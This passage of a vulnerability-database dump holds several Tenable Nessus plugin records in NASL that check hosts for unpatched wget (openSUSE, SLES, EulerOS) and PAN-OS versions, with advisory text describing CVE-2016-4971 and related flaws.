value:\"p-cpe:/a:novell:suse_linux:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-debuginfo-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"wget-debugsource-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"wget-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"wget-debuginfo-1.14-10.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"wget-debugsource-1.14-10.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-02T16:53:28", "description": "This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096, CVE-2015-2059).\n\n - Fix 
for wget fails with basicauth: Failed writing HTTP request: Bad file descriptor (bsc#958342)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-09-12T00:00:00", "type": "nessus", "title": "openSUSE Security Update : wget (openSUSE-2016-1067)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-2059", "CVE-2016-4971"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:wget", "p-cpe:/a:novell:opensuse:wget-debuginfo", "p-cpe:/a:novell:opensuse:wget-debugsource", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-1067.NASL", "href": "https://www.tenable.com/plugins/nessus/93430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93430);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-2059\", \"CVE-2016-4971\");\n\n script_name(english:\"openSUSE Security Update : wget (openSUSE-2016-1067)\");\n script_summary(english:\"Check for the openSUSE-2016-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for wget fixes the following issues :\n\n - Fix for HTTP to a FTP redirection file name confusion\n vulnerability (bsc#984060, CVE-2016-4971).\n\n - Work around a libidn vulnerability (bsc#937096,\n CVE-2015-2059).\n\n - Fix for wget fails with basicauth: Failed writing HTTP\n request: Bad file descriptor (bsc#958342)\n\nThis update was imported from 
the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debuginfo-1.14-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"wget-debugsource-1.14-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget / wget-debuginfo / wget-debugsource\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-19T13:50:30", "description": "According to the versions of the wget package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A stack-based buffer overflow when processing chunked, encoded HTTP responses was found in wget. 
By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.(CVE-2017-13089)\n\n - A flaw was found in the way Wget handled symbolic links. A malicious FTP server could allow Wget running in the mirror mode (using the '-m' command line option) to write an arbitrary file to a location writable to by the user running Wget, possibly leading to code execution.(CVE-2014-4877)\n\n - A cookie injection flaw was found in wget. An attacker can create a malicious website which, when accessed, overrides cookies belonging to arbitrary domains.(CVE-2018-0494)\n\n - It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.(CVE-2016-4971)\n\n - A heap-based buffer overflow, when processing chunked encoded HTTP responses, was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.(CVE-2017-13090)\n\n - Race condition in wget 1.17 and earlier, when used in recursive or mirroring mode to download a single file, might allow remote servers to bypass intended access list restrictions by keeping an HTTP connection open.(CVE-2016-7098)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : wget (EulerOS-SA-2019-1417)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4877", "CVE-2016-4971", "CVE-2016-7098", "CVE-2017-13089", "CVE-2017-13090", "CVE-2018-0494"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:wget", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1417.NASL", "href": "https://www.tenable.com/plugins/nessus/124920", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124920);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-4877\",\n \"CVE-2016-4971\",\n \"CVE-2016-7098\",\n \"CVE-2017-13089\",\n \"CVE-2017-13090\",\n \"CVE-2018-0494\"\n );\n script_bugtraq_id(\n 70751\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : wget (EulerOS-SA-2019-1417)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the wget package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - A stack-based buffer overflow when processing chunked,\n encoded HTTP responses was found in wget. 
By tricking\n an unsuspecting user into connecting to a malicious\n HTTP server, an attacker could exploit this flaw to\n potentially execute arbitrary code.(CVE-2017-13089)\n\n - A flaw was found in the way Wget handled symbolic\n links. A malicious FTP server could allow Wget running\n in the mirror mode (using the '-m' command line option)\n to write an arbitrary file to a location writable to by\n the user running Wget, possibly leading to code\n execution.(CVE-2014-4877)\n\n - A cookie injection flaw was found in wget. An attacker\n can create a malicious website which, when accessed,\n overrides cookies belonging to arbitrary\n domains.(CVE-2018-0494)\n\n - It was found that wget used a file name provided by the\n server for the downloaded file when following a HTTP\n redirect to a FTP server resource. This could cause\n wget to create a file with a different name than\n expected, possibly allowing the server to execute\n arbitrary code on the client.(CVE-2016-4971)\n\n - A heap-based buffer overflow, when processing chunked\n encoded HTTP responses, was found in wget. By tricking\n an unsuspecting user into connecting to a malicious\n HTTP server, an attacker could exploit this flaw to\n potentially execute arbitrary code.(CVE-2017-13090)\n\n - Race condition in wget 1.17 and earlier, when used in\n recursive or mirroring mode to download a single file,\n might allow remote servers to bypass intended access\n list restrictions by keeping an HTTP connection\n open.(CVE-2016-7098)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1417\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2a38e8a1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected wget packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-13090\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"wget-1.14-15.1.h5\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:26:17", "description": "The version of Palo Alto Networks PAN-OS running on the remote host is 6.1.x prior to 6.1.17, 7.0.x prior to 7.0.15, 7.1.x prior to 7.1.10, or 8.0.x prior to 8.0.2. 
It is, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in the GNU wget component when handling server redirects to FTP resources due to the destination file name being obtained from the redirected URL and not the original URL. An unauthenticated, remote attacker can exploit this, via a specially crafted response, to cause a different file name to be used than intended, resulting in writing to arbitrary files. (CVE-2016-4971)\n\n - A flaw exists in the Linux kernel due to improper determination of the rate of challenge ACK segments. An unauthenticated, remote attacker can exploit this to gain access to the shared counter, which makes it easier to hijack TCP sessions using a blind in-window attack.\n This issue only affects version 7.1.x. (CVE-2016-5696)\n\n - An out-of-bounds read error exists when handling packets using the CHACHA20/POLY1305 or RC4-MD5 ciphers. An unauthenticated, remote attacker can exploit this, via specially crafted truncated packets, to cause a denial of service condition. This issue does not affect version 6.1.x. (CVE-2017-3731)\n\n - A cross-site scripting (XSS) vulnerability exists in GlobalProtect due to improper validation of user-supplied input to unspecified request parameters before returning it to users. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session. This issue only affects version 7.0.x.\n (CVE-2017-7409)\n\n - A flaw exists in the web-based management interface due to improper permission checks that allows an authenticated, remote attacker to disclose sensitive information. This issue only affects versions 6.1.x, 7.0.x, and 8.0.x. (CVE-2017-7644)\n\n - An information disclosure vulnerability exists in the GlobalProtect external interface due to returning different error messages when handling login attempts with valid or invalid usernames. 
An unauthenticated, remote attacker can exploit this to enumerate valid user accounts. This issue only affects versions 6.1.x, 7.0.x, and 8.0.x. (CVE-2017-7945)\n\n - A denial of service vulnerability exists in the firewall when handling stale responses to authentication requests prior to selecting CHAP or PAP as the protocol. An unauthenticated, remote attacker can exploit this to cause the authentication process (authd) to stop responding. This issue only affects versions 7.0.x and 7.1.x.\n\n - An information disclosure vulnerability exists when viewing changes in the configuration log due to the 'Auth Password' and 'Priv Password' for the SNMPv3 server profile not being properly masked. A local attacker can exploit this to disclose password information. This issue only affects versions 7.1.x and 8.0.x.\n\n - A denial of service vulnerability exists due to a flaw when handling HA3 messages. An unauthenticated, remote attacker can exploit this to cause several processes to stop. This issue only affects version 7.1.x.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-25T00:00:00", "type": "nessus", "title": "Palo Alto Networks PAN-OS 6.1.x < 6.1.17 / 7.0.x < 7.0.15 / 7.1.x < 7.1.10 / 8.0.x < 8.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": 
"AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971", "CVE-2016-5696", "CVE-2017-3731", "CVE-2017-7409", "CVE-2017-7644", "CVE-2017-7945"], "modified": "2019-01-02T00:00:00", "cpe": ["cpe:/o:paloaltonetworks:pan-os"], "id": "PALO_ALTO_PAN-OS_7_0_15.NASL", "href": "https://www.tenable.com/plugins/nessus/100419", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100419);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/01/02 11:18:37\");\n\n script_cve_id(\n \"CVE-2016-4971\",\n \"CVE-2016-5696\",\n \"CVE-2017-3731\",\n \"CVE-2017-7409\",\n \"CVE-2017-7644\",\n \"CVE-2017-7945\"\n );\n script_bugtraq_id(\n 91530,\n 91704,\n 95813,\n 98404,\n 97953,\n 98396\n );\n script_xref(name:\"EDB-ID\", value:\"40064\");\n\n script_name(english:\"Palo Alto Networks PAN-OS 6.1.x < 6.1.17 / 7.0.x < 7.0.15 / 7.1.x < 7.1.10 / 8.0.x < 8.0.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the PAN-OS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The version of Palo Alto Networks PAN-OS running on the remote host is\n6.1.x prior to 6.1.17, 7.0.x prior to 7.0.15, 7.1.x prior to 7.1.10,\nor 8.0.x prior to 8.0.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A flaw exists in the GNU wget component when handling\n server redirects to FTP resources due to the destination\n file name being obtained from the redirected URL and not\n the original URL. An unauthenticated, remote attacker\n can exploit this, via a specially crafted response, to\n cause a different file name to be used than intended,\n resulting in writing to arbitrary files. 
(CVE-2016-4971)\n\n - A flaw exists in the Linux kernel due to improper\n determination of the rate of challenge ACK segments. An\n unauthenticated, remote attacker can exploit this to\n gain access to the shared counter, which makes it easier\n to hijack TCP sessions using a blind in-window attack.\n This issue only affects version 7.1.x. (CVE-2016-5696)\n\n - An out-of-bounds read error exists when handling packets\n using the CHACHA20/POLY1305 or RC4-MD5 ciphers. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted truncated packets, to cause a denial\n of service condition. This issue does not affect version\n 6.1.x. (CVE-2017-3731)\n\n - A cross-site scripting (XSS) vulnerability exists in\n GlobalProtect due to improper validation of\n user-supplied input to unspecified request parameters\n before returning it to users. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n request, to execute arbitrary script code in a user's\n browser session. This issue only affects version 7.0.x.\n (CVE-2017-7409)\n\n - A flaw exists in the web-based management interface due\n to improper permission checks that allows an\n authenticated, remote attacker to disclose sensitive\n information. This issue only affects versions 6.1.x,\n 7.0.x, and 8.0.x. (CVE-2017-7644)\n\n - An information disclosure vulnerability exists in the\n GlobalProtect external interface due to returning\n different error messages when handling login attempts\n with valid or invalid usernames. An unauthenticated,\n remote attacker can exploit this to enumerate valid\n user accounts. This issue only affects versions 6.1.x,\n 7.0.x, and 8.0.x. (CVE-2017-7945)\n\n - A denial of service vulnerability exists in the firewall\n when handling stale responses to authentication requests\n prior to selecting CHAP or PAP as the protocol. An\n unauthenticated, remote attacker can exploit this to\n cause the authentication process (authd) to stop\n responding. 
This issue only affects versions 7.0.x and\n 7.1.x.\n\n - An information disclosure vulnerability exists when\n viewing changes in the configuration log due to the\n 'Auth Password' and 'Priv Password' for the SNMPv3\n server profile not being properly masked. A local\n attacker can exploit this to disclose password\n information. This issue only affects versions 7.1.x and\n 8.0.x.\n\n - A denial of service vulnerability exists due to a flaw\n when handling HA3 messages. An unauthenticated, remote\n attacker can exploit this to cause several processes to\n stop. This issue only affects version 7.1.x.\n\");\n # https://www.paloaltonetworks.com/documentation/80/pan-os/pan-os-release-notes/pan-os-8-0-2-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d96265b\");\n # https://www.paloaltonetworks.com/documentation/80/pan-os/pan-os-release-notes/pan-os-8-0-1-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f083775\");\n # https://www.paloaltonetworks.com/documentation/80/pan-os/pan-os-release-notes/pan-os-8-0-0-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aacbe40b\");\n # https://www.paloaltonetworks.com/documentation/71/pan-os/pan-os-release-notes/pan-os-7-1-10-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?49c666f2\");\n # https://www.paloaltonetworks.com/documentation/70/pan-os/pan-os-release-notes/pan-os-7-0-15-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fe505ba3\");\n # https://www.paloaltonetworks.com/documentation/61/pan-os/pan-os-release-notes/pan-os-6-1-17-addressed-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9254ef1a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Palo Alto Networks PAN-OS version 6.1.17 / 7.0.15 /\n7.1.10 / 8.0.2 or later.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:paloaltonetworks:pan-os\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Palo Alto Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"palo_alto_version.nbin\");\n script_require_keys(\"Host/Palo_Alto/Firewall/Version\", \"Host/Palo_Alto/Firewall/Full_Version\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_name = \"Palo Alto Networks PAN-OS\";\n\napp_info = vcf::get_app_info(app:app_name, kb_ver:\"Host/Palo_Alto/Firewall/Full_Version\", webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n {\"min_version\" : \"8.0.0\", \"max_version\" : \"8.0.1\", \"fixed_version\" : \"8.0.2\" },\n {\"min_version\" : \"7.1.0\", \"max_version\" : \"7.1.9\", \"fixed_version\" : \"7.1.10\" },\n {\"min_version\" : \"7.0.0\", \"max_version\" : \"7.0.14\", \"fixed_version\" : \"7.0.15\" },\n {\"min_version\" : \"6.1.0\", \"max_version\" : \"6.1.16\", \"fixed_version\" : \"6.1.17\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{xss:true});\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "redhatcve": [{"lastseen": "2021-09-06T11:00:07", "description": "It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.\n#### Mitigation\n\nUse wget with \"-O\" option to explicitly specify the output filename.
